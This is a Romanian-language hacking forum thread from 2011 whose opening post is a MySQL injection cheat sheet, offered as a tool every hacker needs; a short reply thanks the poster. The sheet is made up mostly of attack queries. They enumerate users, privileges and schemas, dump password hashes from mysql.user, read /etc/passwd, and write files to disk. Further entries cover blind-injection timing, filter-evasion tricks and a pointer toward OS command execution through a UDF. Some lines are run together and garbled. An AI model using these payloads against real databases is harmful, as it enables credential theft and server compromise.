Mecanik Posted December 7, 2011 Report Posted December 7, 2011 /*Dupa parerea mea am postat bine aici,daca nu rog un admin sa il mute unde considera el ca trebuie./*Iata va prezint un Cheat Sheet pe care orice hacker trebuie sa le aibe,Se folosesc la MySql Inject.Aceste sunt functii importante,toate intr-un loc:Trebuie sa stiti si putina engleza,altfel nu aveti sanse de MySql InjectVersion:SELECT VERSION()SELECT @@versionSELECT @@version_commentSELECT @@version_compile_machineSELECT @@version_compile_osDirectories:SELECT @@basedirSELECT @@tmpdirSELECT @@datadirUsers:SELECT USER()SELECT SYSTEM_USER()SELECT SESSION_USER()SELECT CURRENT_USER()Current Database:SELECT DATABASE()Concatenation:SELECT CONCAT('foo','.','bar'); #Returns: foo.barSELECT CONCAT_WS(' ','Hello','MySQL','and','hello','world!'); #Returns: Hello MySQL and hello world!Multi-Concat:#Stacks the row "foo" from the table "bar" together, using the separator "<br />".#Note: This operation can by default only grab 1024 bytes, and do not allow LIMIT.#The 1024 byte limit is stored in the @@group_concat_max_len variable.SELECT GROUP_CONCAT(foo SEPARATOR '<br />') FROM barBetter-Concat:#CONCAT() and CONCAT_WS() do not have the same restriction(s) as GROUP_CONCAT().#Which therefor allows you to concat strings together up to the @@max_allowed_packet size,#instead of @@group_concat_max_len. The default value for @@max_allowed_packet is currently set to#1048576 bytes, instead of @@group_concat_max_len's 1024.SELECT (CONCAT_WS(0x3A,(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 0,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 1,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 2,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 3,1),(SELECT CONCAT_WS(0x2E,table_schema,table_name,column_name) FROM information_schema.columns LIMIT 4,1)))Change Collation:SELECT CONVERT('test' USING latin1); #Converts "test" to latin1 from any other collation.SELECT CONVERT('rawr' USING utf8); #Converts "rawr" to utf8.Wildcards in SELECT(s):SELECT foo FROM bar WHERE id LIKE 'test%'; #Returns all COLUMN(s) starting with "test".SELECT foo FROM bar WHERE id LIKE '%test'; #Returns all COLUMN(s) ending with "test".Regular Expression in SELECT(s):#Returns all columns matching the regular expression.SELECT foo FROM bar WHERE id RLIKE '(moo|rawr).*'SELECT Without Dublicates:SELECT DISTINCT foo FROM barCounting Columns:SELECT COUNT(foo) FROM bar; #Returns the amount of rows "foo" from the table "bar".Get Amount of MySQL Users:SELECT COUNT(user) FROM mysql.userGet MySQL Users:SELECT user FROM mysql.userGet MySQL User Privileges:SELECT grantee,privilege_type,is_grantable FROM information_schema.user_privilegesGet MySQL User Privileges on Different Databases:SELECT grantee,table_schema,privilege_type FROM information_schema.schema_privilegesGet MySQL User Privileges on Different Columns:SELECT table_schema,table_name,column_name,privilege_type FROM information_schema.column_privilegesGet MySQL User Credentials & Privileges:SELECT CONCAT_WS(0x2E,host,user,password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,Repl_client_priv) FROM mysql.userGet MySQL DBA Accounts:SELECT grantee,privilege_type,is_grantable FROM information_schema.user_privileges WHERE privilege_type='SUPER'SELECT host,user FROM mysql.user WHERE Super_priv='Y'Get Databases:SELECT schema_name FROM information_schema.schemataSELECT DISTINCT db FROM mysql.dbSELECT DISTINCT table_schema FROM information_schema.columnsSELECT DISTINCT table_schema FROM information_schema.tablesGet Databases & Tables:SELECT table_schema,table_name FROM information_schema.tablesSELECT DISTINCT table_schema,table_name FROM information_schema.columnsGet Databases, Tables & Columns:SELECT table_schema,table_name,column_name FROM information_schema.columnsSELECT A Certain Row:SELECT foo FROM bar LIMIT 0,1; #Returns row 0.SELECT foo FROM bar LIMIT 1,1; #Returns row 1....SELECT foo FROM bar LIMIT N,1; #Returns row N.Benchmark (Heavy Query):#Performs an MD5 calculation of "1" for 10000 times.SELECT BENCHMARK(10000,MD5(1))Sleep:#Works only in MySQL 5 and above.#Sleeps for 5 seconds, returns 0 on success.SELECT SLEEP(5)Conversion (Casting):SELECT CAST('1' AS UNSIGNED INTEGER); #Returns: 1SELECT CAST('65' AS CHAR); #Returns: ASubstring:SELECT SUBSTR('foobar',1,3); #Returns: fooHexadecimal Evasion:SELECT 0x41424344; #Returns: ABCDSELECT 0x2E; #Returns: .SELECT 0x3A; #Returns: :ASCII to Number:SELECT ASCII('A'); #Returns: 65Number to ASCII:SELECT CHAR(65); #Returns: ASELECT CHAR(89); #Returns: YSELECT CHAR(116,101,115,116); #Returns: testIf Statement:#Returns 1 if the database is running MySQL 5.SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=53,1,0);#Returns 1 if the database is running MySQL 4.SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=52,1,0);Case Statement:#Returns 1 if the database is running MySQL 5.SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=53) THEN 1 ELSE 0 END#Returns 1 if the database is running MySQL 4.SELECT CASE WHEN (ASCII(SUBSTR(VERSION(),1,1))=52) THEN 1 ELSE 0 ENDRead File(s):#Requires you to have the File_priv in mysql.user. On error this statement will return NULL.SELECT LOAD_FILE('/etc/passwd')Write File(s):#You must use quotes on the filename!SELECT 'Hello World' INTO DUMPFILE '/tmp/test.txt'SELECT IF((SELECT NULL INTO DUMPFILE '/tmp/test.txt')=NULL,NULL,'Hello World')Logical Operator(s):AND, &&; #The AND operator have && as an alternative syntax.OR, ||; #The OR operator have || as an alternative syntax.NOT, !; #The NOT operator have ! as an alternative syntax.XOR; #The XOR operator got no alternative syntax.Fuzzy Code Comment:#Code within /*! are getting executed by MySQL. Additional /*! can be used instead of space as evasion.SELECT/*!CONCAT_WS(0x3A,user,host,password)/*!FROM/*!mysql.user*/Comments:SELECT foo, bar FROM Single line commentSELECT foo, bar FROM* Multi line comment */SELECT foo, bar FROM Single line commentSELECT foo, bar FROM;%00 Batched query with additional NULL-byte. It do not work together with PHP though.A few evasions/methods to use between your MySQL statements:CR (%0D); #Carrier Return.LF (%0A); #Line Feed.Tab (%09); #The Tab-key.Space (%20); #Most commonly used. You know what a space is.Multiline Comment (/**/); #Well, as the name says.Fuzzy Comment (/*!); #Be sure to end your query with (*/)Parenthesis, ( and ); #Can also be used as separators when used right.Parenthesis instead of space:#As said two lines above, the use of parenthesis can be used as a separator.SELECT * FROM WHERE id=(-1)UNION(SELECT(1),(2))Auto-Casting to Right Collation:SELECT UNHEX(HEX(USER())); #UNHEX() Converts the hexadecimal value(s) to the current collation.DNS Requests (OOB (Out-Of-Band)):Command Execution:#If you're on a MySQL 4.X server, it's possible to execute OS commands as long as you're DBA.#It can be done if you're able to upload a shared object into /usr/lib.#The file extension is .so, and it must contain an "User Defined Function", UDF.#Get raptor_udf.c, it's the source-code for just that feature.#Remember to compile it for the right CPU Architecture.#The CPU architecture can be resolved by this query:SELECT @@version_machine; Quote
CrashOverride Posted December 8, 2011 Report Posted December 8, 2011 super tare chiar cautam asa ceva thx Quote